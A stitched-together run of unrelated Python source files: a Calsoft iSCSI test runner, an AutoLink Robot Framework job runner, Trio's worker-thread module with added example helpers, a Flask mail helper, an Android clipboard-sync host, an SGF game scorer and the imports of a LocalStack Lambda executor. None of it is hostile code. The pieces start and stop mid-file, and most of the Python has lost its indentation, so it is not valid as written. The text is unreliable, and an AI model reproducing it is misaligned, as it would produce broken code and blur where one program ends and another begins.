63 characters.
key name: A standard-label
'''
known_failed_cases = ['tc_ffp_15_2', 'tc_ffp_29_2', 'tc_ffp_29_3',
'tc_err_1_1', 'tc_err_1_2', 'tc_err_2_8',
'tc_err_3_1', 'tc_err_3_2', 'tc_err_3_3',
'tc_err_3_4', 'tc_err_5_1', 'tc_login_3_1',
'tc_login_11_2', 'tc_login_11_4', 'tc_login_2_2']
def run_case(case, result_list, log_dir_path):
try:
case_log = subprocess.check_output("{}/{}".format(CALSOFT_BIN_PATH, case), stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
result_list.append({"Name": case, "Result": "FAIL"})
case_log = e.output
else:
result_list.append({"Name": case, "Result": "PASS"})
with open(log_dir_path + case + '.txt', 'w') as f:
f.write(case_log)
def main():
if not os.path.exists(CALSOFT_BIN_PATH):
print "The Calsoft test suite is not available on this machine."
sys.exit(1)
output_dir = sys.argv[1]
if len(sys.argv) > 2:
output_file = sys.argv[2]
else:
output_file = "%s/calsoft.json" % (output_dir)
log_dir = "%s/calsoft/" % output_dir
all_cases = [x for x in os.listdir(CALSOFT_BIN_PATH) if x.startswith('tc')]
all_cases.sort()
case_result_list = []
result = {"Calsoft iSCSI tests": case_result_list}
if not os.path.exists(log_dir):
os.mkdir(log_dir)
for case in known_failed_cases:
print "Skipping %s. It is known to fail." % (case)
case_result_list.append({"Name": case, "Result": "SKIP"})
thread_objs = []
left_cases = list(set(all_cases) - set(known_failed_cases))
index = 0
max_thread_count = 32
while index < len(left_cases):
cur_thread_count = 0
for thread_obj in thread_objs:
if thread_obj.is_alive():
cur_thread_count += 1
while cur_thread_count < max_thread_count and index < len(left_cases):
thread_obj = threading.Thread(target=run_case, args=(left_cases[index], case_result_list, log_dir, ))
thread_obj.start()
time.sleep(0.02)
thread_objs.append(thread_obj)
index += 1
cur_thread_count += 1
end_time = time.time() + 30
while time.time() < end_time:
for thread_obj in thread_objs:
if thread_obj.is_alive():
break
else:
break
else:
print "Thread timeout"
exit(1)
with open(output_file, 'w') as f:
json.dump(obj=result, fp=f, indent=2)
if any(["FAIL" == x["Result"] for x in case_result_list]):
print "Test case %s failed." % (x["Name"])
sys.exit(1)
if __name__ == '__main__':
main()
|
run.py
|
# -*- coding: utf-8 -*-
__author__ = "苦叶子"
"""
公众号: 开源优测
Email: lymking@foxmail.com
"""
import sys
import codecs
from flask import current_app, session, url_for, g
from flask_mail import Mail, Message
import threading
from threading import Thread
import multiprocessing
import time
import smtplib
from email.mime.text import MIMEText
from email.header import Header
import json
from robot.api import TestSuiteBuilder, ResultWriter, ExecutionResult
from utils.file import exists_path, make_nod, write_file, read_file, mk_dirs
from staticVar import staticVar
def robot_job(app, name, username):
with app.app_context():
project = app.config["AUTO_HOME"] + "/workspace/%s/%s" % (username, name)
output = app.config["AUTO_HOME"] + "/jobs/%s/%s" % (username, name)
if not is_run(app, project):
p = multiprocessing.Process(target=robot_run, args=(username, name, project, output))
p.start()
app.config["AUTO_ROBOT"].append({"name": project, "process": p})
print("-+" * 15)
print(app.config["AUTO_ROBOT"])
print("-+" * 15)
def robot_run(username, name, project, output):
if not exists_path(output):
mk_dirs(output)
suite = TestSuiteBuilder().build(project)
(out, index) = reset_next_build_numb(output)
result = suite.run(output_directory=out,
output=out + "/output.xml",
debugfile=out + "/debug.txt",
loglevel="TRACE")
# reset_last_status(result, output, index)
# Report and xUnit files can be generated based on the result object.
# ResultWriter(result).write_results(report=out + '/report.html', log=out + '/log.html')
detail_result = ExecutionResult(out + "/output.xml")
# detail_result.save(out + "/output_new.xml")
reset_last_status(detail_result, output, index)
# Report and xUnit files can be generated based on the result object.
ResultWriter(detail_result).write_results(report=out + '/report.html', log=out + '/log.html')
send_robot_report(username, name, index, detail_result, out)
def reset_next_build_numb(output):
next_build_number = output + "/nextBuildNumber"
index = 1
data = "%d" % (index + 1)
if not exists_path(next_build_number):
make_nod(next_build_number)
else:
index = int(read_file(next_build_number)["data"])
data = "%d" % (index + 1)
write_file(next_build_number, data)
out = output + "/%d" % index
if not exists_path(output):
mk_dirs(output)
return (out, index)
def reset_last_status(result, output, index):
stats = result.statistics
fail = stats.total.critical.failed
last_fail = output + "/lastFail"
last_passed = output + "/lastPassed"
data = "%d" % index
if fail != 0:
if not exists_path(last_fail):
make_nod(last_fail)
write_file(last_fail, data)
else:
if not exists_path(last_passed):
make_nod(last_passed)
write_file(last_passed, data)
def remove_robot(app):
lock = threading.Lock()
lock.acquire()
for p in app.config["AUTO_ROBOT"]:
if not p["process"].is_alive():
app.config["AUTO_ROBOT"].remove(p)
break
lock.release()
def stop_robot(app, name):
lock = threading.Lock()
lock.acquire()
for p in app.config["AUTO_ROBOT"]:
if name == p["name"]:
if p["process"].is_alive():
p["process"].terminate()
time.sleep(0.2)
app.config["AUTO_ROBOT"].remove(p)
break
lock.release()
return True
def is_run(app, name):
remove_robot(app)
for p in app.config["AUTO_ROBOT"]:
if name == p["name"]:
return True
return False
def send_robot_report( username, name, task_no, result, output):
with staticVar.initapp.app_context():
app = current_app._get_current_object()
build_msg = "<font color='green'>Success</font>"
if result.statistics.total.critical.failed != 0:
build_msg = "<font color='red'>Failure</font>"
report_url = url_for("routes.q_view_report",
_external=True,
username=username,
project=name,
task=task_no)
msg = MIMEText("""Hello, %s<hr>
项目名称:%s<hr>
构建编号: %s<hr>
构建状态: %s<hr>
持续时间: %s毫秒<hr>
详细报告: <a href='%s'>%s</a><hr>
构建日志: <br>%s<hr><br><br>
(本邮件是程序自动下发的,请勿回复!)""" %
(username,
result.statistics.suite.stat.name,
task_no,
build_msg,
result.suite.elapsedtime,
report_url, report_url,
codecs.open(output + "/debug.txt", "r", "utf-8").read().replace("\n", "<br>")
),
"html", "utf-8")
msg["Subject"] = Header("AutoLink通知消息", "utf-8")
try:
user_path = app.config["AUTO_HOME"] + "/users/%s/config.json" % username
user_conf = json.load(codecs.open(user_path, 'r', 'utf-8'))
for p in user_conf["data"]:
if p["name"] == name:
if result.statistics.total.critical.failed != 0:
msg["To"] = p["fail_list"]
else:
msg["To"] = p["success_list"]
break
conf_path = app.config["AUTO_HOME"] + "/auto.json"
config = json.load(codecs.open(conf_path, 'r', 'utf-8'))
msg["From"] = config["smtp"]["username"]
if config["smtp"]["ssl"]:
smtp = smtplib.SMTP_SSL()
else:
smtp = smtplib.SMTP()
# 连接至服务器
smtp.connect(config["smtp"]["server"], int(config["smtp"]["port"]))
# 登录
smtp.login(config["smtp"]["username"], config["smtp"]["password"])
# 发送邮件
smtp.sendmail(msg["From"], msg["To"].split(","), msg.as_string().encode("utf8"))
# 断开连接
smtp.quit()
except Exception as e:
print("邮件发送错误: %s" % e)
class RobotRun(threading.Thread):
def __init__(self, name, output, lock, executor="auto"):
threading.Thread.__init__(self)
self.lock = lock
self.project = name
self.output = output
self.executor = executor
self.suite = None
self.result = None
def run(self):
#lock = threading.Lock()
# self.lock.acquire()
if not exists_path(self.output):
mk_dirs(self.output)
self.suite = TestSuiteBuilder().build(self.project)
(output, index) = self.reset_next_build_numb()
self.setName(output)
self.result = self.suite.run(output_directory=output,
output=output + "/output.xml",
debugfile=output + "/debug.txt",
loglevel="TRACE")
# self.reset_last_status(index)
# Report and xUnit files can be generated based on the result object.
# ResultWriter(self.result
|
_threads.py
|
import threading
import queue as stdlib_queue
from itertools import count
import attr
import outcome
import trio
from ._sync import CapacityLimiter
from ._core import enable_ki_protection, disable_ki_protection, RunVar, TrioToken
# Global due to Threading API, thread local storage for trio token
TOKEN_LOCAL = threading.local()
class BlockingTrioPortal:
def __init__(self, trio_token=None):
if trio_token is None:
trio_token = trio.hazmat.current_trio_token()
self._trio_token = trio_token
def run(self, afn, *args):
return from_thread_run(afn, *args, trio_token=self._trio_token)
def run_sync(self, fn, *args):
return from_thread_run_sync(fn, *args, trio_token=self._trio_token)
################################################################
# XX at some point it probably makes sense to implement some sort of thread
# pool? Or at least that's what everyone says.
#
# There are two arguments for thread pools:
# - speed (re-using threads instead of starting new ones)
# - throttling (if you have 1000 tasks, queue them up instead of spawning 1000
# threads and running out of memory)
#
# Regarding speed, it's not clear how much of an advantage this is. Some
# numbers on my Linux laptop:
#
# Spawning and then joining a thread:
#
# In [25]: %timeit t = threading.Thread(target=lambda: None); t.start(); t.join()
# 10000 loops, best of 3: 44 µs per loop
#
# Using a thread pool:
#
# In [26]: tpp = concurrent.futures.ThreadPoolExecutor()
# In [27]: %timeit tpp.submit(lambda: None).result()
# <warm up run elided>
# In [28]: %timeit tpp.submit(lambda: None).result()
# 10000 loops, best of 3: 40.8 µs per loop
#
# What's a fast getaddrinfo look like?
#
# # with hot DNS cache:
# In [23]: %timeit socket.getaddrinfo("google.com", "80")
# 10 loops, best of 3: 50.9 ms per loop
#
# In [29]: %timeit socket.getaddrinfo("127.0.0.1", "80")
# 100000 loops, best of 3: 9.73 µs per loop
#
#
# So... maybe we can beat concurrent.futures with a super-efficient thread
# pool or something, but there really is not a lot of headroom here.
#
# Of course other systems might be different... here's CPython 3.6 in a
# Virtualbox VM running Windows 10 on that same Linux laptop:
#
# In [13]: %timeit t = threading.Thread(target=lambda: None); t.start(); t.join()
# 10000 loops, best of 3: 127 µs per loop
#
# In [18]: %timeit tpp.submit(lambda: None).result()
# 10000 loops, best of 3: 31.9 µs per loop
#
# So on Windows there *might* be an advantage? You've gotta be doing a lot of
# connections, with very fast DNS indeed, for that 100 us to matter. But maybe
# someone is.
#
#
# Regarding throttling: this is very much a trade-off. On the one hand, you
# don't want to overwhelm the machine, obviously. On the other hand, queueing
# up work on a central thread-pool creates a central coordination point which
# can potentially create deadlocks and all kinds of fun things. This is very
# context dependent. For getaddrinfo, whatever, they'll make progress and
# complete (we hope), and you want to throttle them to some reasonable
# amount. For calling waitpid() (because just say no to SIGCHLD), then you
# really want one thread-per-waitpid(), because for all you know the user has
# written some ridiculous thing like:
#
# for p in processes:
# await spawn(p.wait)
# # Deadlock here if there are enough processes:
# await some_other_subprocess.wait()
# for p in processes:
# p.terminate()
#
# This goes doubly for the sort of wacky thread usage we see in curio.abide
# (though, I'm not sure if that's actually useful in practice in our context,
# run_in_trio_thread seems like it might be a nicer synchronization primitive
# for most uses than trying to make threading.Lock awaitable).
#
# See also this very relevant discussion:
#
# https://twistedmatrix.com/trac/ticket/5298
#
# "Interacting with the products at Rackspace which use Twisted, I've seen
# problems caused by thread-pool maximum sizes with some annoying
# regularity. The basic problem is this: if you have a hard limit on the
# number of threads, *it is not possible to write a correct program which may
# require starting a new thread to un-block a blocked pool thread*" - glyph
#
# For now, if we want to throttle getaddrinfo I think the simplest thing is
# for the socket code to have a semaphore for getaddrinfo calls.
#
# Regarding the memory overhead of threads, in theory one should be able to
# reduce this a *lot* for a thread that's just calling getaddrinfo or
# (especially) waitpid. Windows and pthreads both offer the ability to set
# thread stack size on a thread-by-thread basis. Unfortunately as of 3.6
# CPython doesn't expose this in a useful way (all you can do is set it
# globally for the whole process, so it's - ironically - not thread safe).
#
# (It's also unclear how much stack size actually matters; on a 64-bit Linux
# server with overcommit -- i.e., the most common configuration -- then AFAICT
# really the only real limit is on stack size actually *used*; how much you
# *allocate* should be pretty much irrelevant.)
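# Illustrative-only sketch of the "semaphore for getaddrinfo" idea mentioned
# above. The helper below is not part of trio's API, is never called from this
# module, and the limit of 10 is an arbitrary example value.
import socket as _example_socket

_EXAMPLE_GETADDRINFO_LIMITER = CapacityLimiter(10)

async def _example_throttled_getaddrinfo(host, port):
    # run the blocking lookup in a worker thread, at most 10 at a time
    return await to_thread_run_sync(
        _example_socket.getaddrinfo, host, port,
        limiter=_EXAMPLE_GETADDRINFO_LIMITER,
    )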
_limiter_local = RunVar("limiter")
# I pulled this number out of the air; it isn't based on anything. Probably we
# should make some kind of measurements to pick a good value.
DEFAULT_LIMIT = 40
_thread_counter = count()
def current_default_thread_limiter():
"""Get the default `~trio.CapacityLimiter` used by
`trio.to_thread.run_sync`.
The most common reason to call this would be if you want to modify its
:attr:`~trio.CapacityLimiter.total_tokens` attribute.
"""
try:
limiter = _limiter_local.get()
except LookupError:
limiter = CapacityLimiter(DEFAULT_LIMIT)
_limiter_local.set(limiter)
return limiter
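# Hedged usage sketch for current_default_thread_limiter() above; the helper is
# hypothetical and never called here. It must run inside trio.run(), because
# the limiter is stored in a RunVar.
def _example_allow_more_worker_threads(total=100):
    # raise the cap on simultaneous worker threads from the default of 40
    current_default_thread_limiter().total_tokens = total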
# Eventually we might build this into a full-fledged deadlock-detection
# system; see https://github.com/python-trio/trio/issues/182
# But for now we just need an object to stand in for the thread, so we can
# keep track of who's holding the CapacityLimiter's token.
@attr.s(frozen=True, cmp=False, hash=False)
class ThreadPlaceholder:
name = attr.ib()
@enable_ki_protection
async def to_thread_run_sync(sync_fn, *args, cancellable=False, limiter=None):
"""Convert a blocking operation into an async operation using a thread.
These two lines are equivalent::
sync_fn(*args)
await trio.to_thread.run_sync(sync_fn, *args)
except that if ``sync_fn`` takes a long time, then the first line will
block the Trio loop while it runs, while the second line allows other Trio
tasks to continue working while ``sync_fn`` runs. This is accomplished by
pushing the call to ``sync_fn(*args)`` off into a worker thread.
From inside the worker thread, you can get back into Trio using the
functions in `trio.from_thread`.
Args:
sync_fn: An arbitrary synchronous callable.
*args: Positional arguments to pass to sync_fn. If you need keyword
arguments, use :func:`functools.partial`.
cancellable (bool): Whether to allow cancellation of this operation. See
discussion below.
limiter (None, or CapacityLimiter-like object):
An object used to limit the number of simultaneous threads. Most
commonly this will be a `~trio.CapacityLimiter`, but it could be
anything providing compatible
:meth:`~trio.CapacityLimiter.acquire_on_behalf_of` and
:meth:`~trio.CapacityLimiter.release_on_behalf_of` methods. This
function will call ``acquire_on_behalf_of`` before starting the
thread, and ``release_on_behalf_of`` after the thread has finished.
If None (the default), uses the default `~trio.CapacityLimiter`, as
returned by :func:`current_default_thread_limiter`.
**Cancellation handling**: Cancellation is a tricky issue here, because
neither Python nor the operating systems it runs on provide any general
mechanism for cancelling an arbitrary synchronous function running in a
thread. This function will always check for cancellation on entry, before
starting the thread. But once the thread is running, there are two ways it
can handle being cancelled:
* If ``cancellable=False``, the function ignores the cancellation and
keeps going, just like if we had called ``sync_fn`` synchronously. This
is the default behavior.
* If ``cancellable=True``, then this function immediately raises
`~trio.Cancelled`. In this case **the thread keeps running in
background** – we just abandon it to do whatever it's going to do, and
silently discard any return value or errors that it raises. Only use
this if you know that the operation is safe and side-effect free. (For
      example: :func:`trio.socket.getaddrinfo` uses a thread with
``cancellable=True``, because it doesn't really affect anything if a
stray hostname lookup keeps running in the background.)
The ``limiter`` is only released after the thread has *actually*
finished – which in the case of cancellation may be some time after this
function has returned. If :func:`trio.run` finishes before the thread
does, then the limiter release method will never be called at all.
.. warning::
You should not use this function to call long-running CPU-bound
functions! In addition to the usual GIL-related reasons why using
threads for CPU-bound work is not very effective in Python, there is an
additional problem: on CPython, `CPU-bound threads tend to "starve out"
IO-bound threads <https://bugs.python.org/issue7946>`__, so using
threads for CPU-bound work is likely to adversely affect the main
thread running Trio. If you need to do this, you're better off using a
worker process, or perhaps PyPy (which still has a GIL, but may do a
better job of fairly allocating CPU time between threads).
Returns:
Whatever ``sync_fn(*args)`` returns.
Raises:
Exception: Whatever ``sync_fn(*args)`` raises.
"""
await trio.hazmat.checkpoint_if_cancelled()
token = trio.hazmat.current_trio_token()
if limiter is None:
limiter = current_default_thread_limiter()
# Holds a reference to the task that's blocked in this function waiting
# for the result – or None if this function was cancelled and we should
# discard the result.
task_register = [trio.hazmat.current_task()]
name = "trio-worker-{}".format(next(_thread_counter))
placeholder = ThreadPlaceholder(name)
# This function gets scheduled into the Trio run loop to deliver the
# thread's result.
def report_back_in_trio_thread_fn(result):
def do_release_then_return_result():
# release_on_behalf_of is an arbitrary user-defined method, so it
# might raise an error. If it does, we want that error to
# replace the regular return value, and if the regular return was
# already an exception then we want them to chain.
try:
return result.unwrap()
finally:
limiter.release_on_behalf_of(placeholder)
result = outcome.capture(do_release_then_return_result)
if task_register[0] is not None:
trio.hazmat.reschedule(task_register[0], result)
# This is the function that runs in the worker thread to do the actual
# work and then schedule the call to report_back_in_trio_thread_fn
# Since this is spawned in a new thread, the trio token needs to be passed
# explicitly to it so it can inject it into thread local storage
def worker_thread_fn(trio_token):
TOKEN_LOCAL.token = trio_token
try:
result = outcome.capture(sync_fn, *args)
try:
token.run_sync_soon(report_back_in_trio_thread_fn, result)
except trio.RunFinishedError:
# The entire run finished, so our particular task is certainly
# long gone -- it must have cancelled.
pass
finally:
del TOKEN_LOCAL.token
await limiter.acquire_on_behalf_of(placeholder)
try:
# daemon=True because it might get left behind if we cancel, and in
# this case shouldn't block process exit.
current_trio_token = trio.hazmat.current_trio_token()
thread = threading.Thread(
target=worker_thread_fn,
args=(current_trio_token,),
name=name,
daemon=True
)
thread.start()
except:
limiter.release_on_behalf_of(placeholder)
raise
def abort(_):
if cancellable:
task_register[0] = None
return trio.hazmat.Abort.SUCCEEDED
else:
return trio.hazmat.Abort.FAILED
return await trio.hazmat.wait_task_rescheduled(abort)
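# Hedged usage sketch for to_thread_run_sync() above; `_example_read_file` and
# the path are illustrative only, and nothing here is executed.
def _example_read_file(path):
    with open(path, "rb") as f:
        return f.read()

async def _example_to_thread_usage():
    # push the blocking read into a worker thread so other Trio tasks keep
    # running; pass keyword arguments via functools.partial if needed
    return await to_thread_run_sync(_example_read_file, "/tmp/example.bin")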
def _run_fn_as_system_task(cb, fn, *args, trio_token=None):
"""Helper function for from_thread.run and from_thread.run_sync.
Since this internally uses TrioToken.run_sync_soon, all warnings about
raised exceptions canceling all tasks should be noted.
"""
if trio_token and not isinstance(trio_token, TrioToken):
raise RuntimeError("Passed kwarg trio_token is not of type TrioToken")
if not trio_token:
try:
trio_token = TOKEN_LOCAL.token
except AttributeError:
raise RuntimeError(
"this thread wasn't created by Trio, pass kwarg trio_token=..."
)
# TODO: This is only necessary for compatibility with BlockingTrioPortal.
# once that is deprecated, this check should no longer be necessary because
# thread local storage (or the absence of) is sufficient to check if trio
# is running in a thread or not.
try:
trio.hazmat.current_task()
except RuntimeError:
pass
else:
raise RuntimeError(
"this is a blocking function; call it from a thread"
)
q = stdlib_queue.Queue()
trio_token.run_sync_soon(cb, q, fn, args)
return q.get().unwrap()
def from_thread_run(afn, *args, trio_token=None):
"""Run the given async function in the parent Trio thread, blocking until it
is complete.
Returns:
Whatever ``afn(*args)`` returns.
Returns or raises whatever the given function returns or raises. It
can also raise exceptions of its own:
Raises:
RunFinishedError: if the corresponding call to :func:`trio.run` has
already completed.
Cancelled: if the corresponding call to :func:`trio.run` completes
while ``afn(*args)`` is running, then ``afn`` is likely to raise
            :exc:`trio.Cancelled`, and this will propagate out into this thread.
RuntimeError: if you try calling this from inside the Trio thread,
which would otherwise cause a deadlock.
AttributeError: if no ``trio_token`` was provided, and we can't infer
one from context.
**Locating a Trio Token**: There are two ways to specify which
`trio.run` loop to reenter:
- Spawn this thread from `trio.to_thread.run_sync`. Trio will
automatically capture the relevant Trio token and use it when you
want to re-enter Trio.
    - Pass a keyword argument, ``trio_token``, specifying a specific
`trio.run` loop to re-enter. This is useful in case you have a
"foreign" thread, spawned using some other framework, and still want
to enter Trio.
"""
def callback(q, afn, args):
@disable_ki_protection
async def unprotected_afn():
return await afn(*args)
async def await_in_trio_thread_task():
q.put_nowait(await outcome.acapture(unprotected_afn))
trio.hazmat.spawn_system_task(await_in_trio_thread_task, name=afn)
return _run_fn_as_system_task(callback, afn, *args, trio_token=trio_token)
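# Hedged sketch of re-entering Trio from a worker thread via from_thread_run()
# above; `_example_afn` and `_example_blocking_worker` are illustrative and
# never called here.
async def _example_afn(x):
    await trio.sleep(0)
    return x * 2

def _example_blocking_worker():
    # runs inside a thread started by to_thread_run_sync, so the Trio token is
    # picked up from thread-local storage (TOKEN_LOCAL)
    return from_thread_run(_example_afn, 21)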
def from_thread_run_sync(fn, *args, trio_token=None):
"""Run the given sync function in the parent Trio thread, blocking until it
is complete.
Returns:
Whatever ``fn(*args)`` returns.
Returns or raises whatever the given function returns or raises. It
can also raise exceptions of its own:
Raises:
RunFinishedError: if the corresponding call to `trio.run` has
already completed.
Cancelled: if the corresponding call to `trio.run` completes
            while ``fn(*args)`` is running, then ``fn`` is likely to raise
            :exc:`trio.Cancelled`, and this will propagate out into this thread.
RuntimeError: if you try calling this from inside the Trio thread,
which would otherwise cause a deadlock.
AttributeError: if no ``trio_token`` was provided, and we can't infer
one from context.
**Locating a Trio Token**: There are two ways to specify which
`trio.run` loop to reenter:
- Spawn this thread from `trio.to_thread.run_sync`. Trio will
automatically capture the relevant Trio token and use it when you
want to re-enter Trio.
    - Pass a keyword argument, ``trio_token``, specifying a specific
`trio.run` loop to re-enter. This is useful in case you have a
"foreign" thread, spawned using some other framework, and still want
to enter Trio.
"""
def callback(q, fn, args):
@disable_ki_protection
def unprotected_fn():
return fn(*args)
res = outcome.capture(unprotected_fn)
q.put_nowait(res)
return _run_fn_as_system_task(callback, fn, *args, trio_token=trio_token)
|
email.py
|
from flask import current_app, render_template
from . import mail
from flask_mail import Message
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(to, subject, template, **kwargs):
app = current_app._get_current_object()
    msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + subject, sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
acs_host.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from itertools import chain
from signal import signal, SIGINT, SIG_DFL
from socket import SOL_SOCKET, SO_BROADCAST
from subprocess import Popen, PIPE
from sys import argv, exit
from time import time, sleep
from threading import Thread
import SocketServer
from PyQt5 import QtCore, QtWidgets
from PyQt5.Qt import QApplication, QClipboard
from ipaddress import ip_address
import netifaces
import pynotify
import pysodium
import click
import cbor
HOST = ''
REG_PORT = 9361
CLIP_PORT = 9362
SETTINGS_ORG = 'dnet'
SETTINGS_APP = 'android-clipboard-sync'
SETTINGS_APP_KEY = 'appkey/public'
SETTINGS_PK_KEY = 'keypair/public'
SETTINGS_SK_KEY = 'keypair/secret'
def get_key():
s = QtCore.QSettings(SETTINGS_ORG, SETTINGS_APP)
pk = s.value(SETTINGS_PK_KEY)
sk = s.value(SETTINGS_SK_KEY)
ap = s.value(SETTINGS_APP_KEY)
if not (pk and sk):
pk, sk = pysodium.crypto_box_keypair()
s.setValue(SETTINGS_PK_KEY, QtCore.QByteArray(pk))
s.setValue(SETTINGS_SK_KEY, QtCore.QByteArray(sk))
s.sync()
return str(pk), str(sk), ap and str(ap)
@click.group()
def cli():
pass
@cli.command()
def register():
# TODO this whole thing could be a GUI
pk, sk, _ = get_key()
qrencode = Popen(['qrencode', '-8', '-t', 'ANSIUTF8'], stdin=PIPE)
qrencode.communicate(pk)
click.echo()
click.echo('Please scan the above QR code with the app to continue')
packets = []
class MyUDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
data, socket = self.request
unsealed = pysodium.crypto_box_seal_open(data, pk, sk)
ap = unsealed[:pysodium.crypto_box_PUBLICKEYBYTES]
challenge = unsealed[pysodium.crypto_box_PUBLICKEYBYTES:]
packets.append(ap)
nonce = pysodium.randombytes(pysodium.crypto_box_NONCEBYTES)
response = pysodium.crypto_box(challenge, nonce, ap, sk)
dst = (src2dst(self.client_address[0]), REG_PORT)
socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
socket.sendto(nonce + response, dst)
server = SocketServer.UDPServer((HOST, REG_PORT), MyUDPHandler)
while not packets:
server.handle_request()
unsealed = packets[0]
s = QtCore.QSettings(SETTINGS_ORG, SETTINGS_APP)
s.setValue(SETTINGS_APP_KEY, QtCore.QByteArray(unsealed))
s.sync()
click.echo('The app has been associated with this machine, its public key got stored')
nonces = {} # TODO clear nonces past their validity
@cli.command()
def receiver():
pk, sk, ap = get_key()
if ap is None:
click.echo("Error: no public key registered for the app could be found.", err=True)
click.echo("You have to register first using the 'register' command.", err=True)
exit(1)
app = QtWidgets.QApplication(argv)
cb = QApplication.clipboard()
pynotify.init("ACS")
class ClipboardWrapper(QtCore.QObject):
signal = QtCore.pyqtSignal(unicode)
def __init__(self):
QtCore.QObject.__init__(self)
self.signal.connect(self.copy_string)
def copy_string(self, value):
cb.setText(value, cb.Clipboard)
if cb.supportsSelection():
cb.setText(value, cb.Selection)
pynotify.Notification("Android Clipboard Sync", "Text was copied to the host clipboard").show()
cw = ClipboardWrapper()
class MyUDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = self.request[0]
nonce = data[:pysodium.crypto_box_NONCEBYTES]
if nonce in nonces:
return
box = data[pysodium.crypto_box_NONCEBYTES:]
validity, payload = cbor.loads(pysodium.crypto_box_open(box, nonce, ap, sk))
if validity < time():
return
nonces[nonce] = validity
cw.signal.emit(payload)
server = SocketServer.UDPServer((HOST, CLIP_PORT), MyUDPHandler)
Thread(target=server.serve_forever).start()
signal(SIGINT, SIG_DFL)
click.echo("Receiver started, press Ctrl + C to exit")
exit(app.exec_())
def src2dst(src):
src_int = ip_num(src)
for interface in netifaces.interfaces():
for address in chain.from_iterable(netifaces.ifaddresses(interface).itervalues()):
netmask_str = address.get('netmask')
if netmask_str is None:
continue
try:
netmask = ip_num(netmask_str)
addr = ip_num(address['addr'])
except ValueError:
continue
if (netmask & addr) == (netmask & src_int):
broadcast = address.get('broadcast')
if broadcast:
return broadcast
return src
def ip_num(ip):
return int(ip_address(unicode(ip)))
if __name__ == '__main__':
cli()
|
sgf2score.py
|
#!/usr/bin/env python3
# Copyright 2017 Karl Sundequist Blomdahl <karl.sundequist.blomdahl@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=C0103, C0301
"""
Reads a _big_ SGF file from standard input and writes to standard output the
same games after they have been scored by a referee.
Usage: ./sgf2score.py < kgs_big.sgf > kgs_score.sgf
"""
import multiprocessing
import re
from subprocess import Popen, PIPE, DEVNULL
import sys
import tempfile
import threading
RE = re.compile(r'RE\[([^\]]+)\]')
PRINT_LOCK = threading.Lock()
def score_game(sgf):
"""
Returns the winner of the game in the given SGF file as
judged by `gnugo`.
"""
with tempfile.NamedTemporaryFile() as sgf_file:
sgf_file.write(sgf.encode())
sgf_file.flush()
# start-up our judge (gnugo)
gnugo = Popen(
['/usr/games/gnugo',
'--score', 'aftermath',
'--chinese-rules', '--positional-superko',
'-l', sgf_file.name],
stdin=DEVNULL,
stdout=PIPE,
stderr=DEVNULL
)
for line in gnugo.stdout:
line = line.decode('utf-8').strip()
if 'White wins by' in line: # White wins by 8.5 points
return 'W+' + line.split()[3]
elif 'Black wins by' in line: # Black wins by 32.5 points
return 'B+' + line.split()[3]
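# Hedged usage sketch for score_game() above; the SGF record is illustrative
# only and this helper is never called.
def _example_score_game():
    sgf = "(;GM[1]FF[4]SZ[19]RE[?];B[pd];W[dp])"
    # returns e.g. 'W+...' or 'B+...', or None if gnugo prints no verdict
    return score_game(sgf)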
def main(every):
""" Main function """
threads = []
cpu_count = max(1, multiprocessing.cpu_count() - 2)
statistics = {
'num_scored': 0,
'num_wrong': 0
}
def _run_unknown(line, statistics):
winner = score_game(line)
if winner:
line = re.sub(RE, 'RE[' + winner + ']', line)
statistics['num_scored'] += 1
with PRINT_LOCK:
print(line)
def _run_check(line, statistics):
winner = score_game(line)
if winner:
if winner[:2] not in line:
statistics['num_wrong'] += 1
line = re.sub(RE, 'RE[' + winner + ']', line)
with PRINT_LOCK:
print(line)
for line in sys.stdin:
line = line.strip()
if "RE[?]" in line:
# start-up a background thread to determine the winner
thread = threading.Thread(target=_run_unknown, args=(line, statistics))
thread.start()
threads.append(thread)
else:
winner = RE.search(line)
resign = winner and 'R' in winner.group(1).upper()
if every and winner and not resign:
# start-up a background thread to check the winner
thread = threading.Thread(target=_run_check, args=(line, statistics))
thread.start()
threads.append(thread)
else:
with PRINT_LOCK:
print(line)
        # poll for any threads that have finished their workload
while len(threads) >= cpu_count:
for thread in threads:
thread.join(0.001) # 1 ms
threads = [thread for thread in threads if thread.is_alive()]
# wait for all threads to finish
for thread in threads:
thread.join()
assert not thread.is_alive()
with PRINT_LOCK:
if statistics['num_scored'] > 0:
print('Arbitrated {} games without a winner'.format(statistics['num_scored']), file=sys.stderr)
if statistics['num_wrong'] > 0:
print('Arbitrated {} games with the wrong winner'.format(statistics['num_wrong']), file=sys.stderr)
if __name__ == '__main__':
main(every=any([arg for arg in sys.argv if arg == '--all']))
|
lambda_executors.py
|
import base64
import contextlib
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
from multiprocessing import Process, Queue
from typing import Any, Dict, List, Optional, Tuple, Union
from localstack import config
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8,
LAMBDA_RUNTIME_JAVA8_AL2,
LAMBDA_RUNTIME_JAVA11,
LAMBDA_RUNTIME_PROVIDED,
)
from localstack.services.install import GO_LAMBDA_RUNTIME, INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.aws_models import LambdaFunction
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
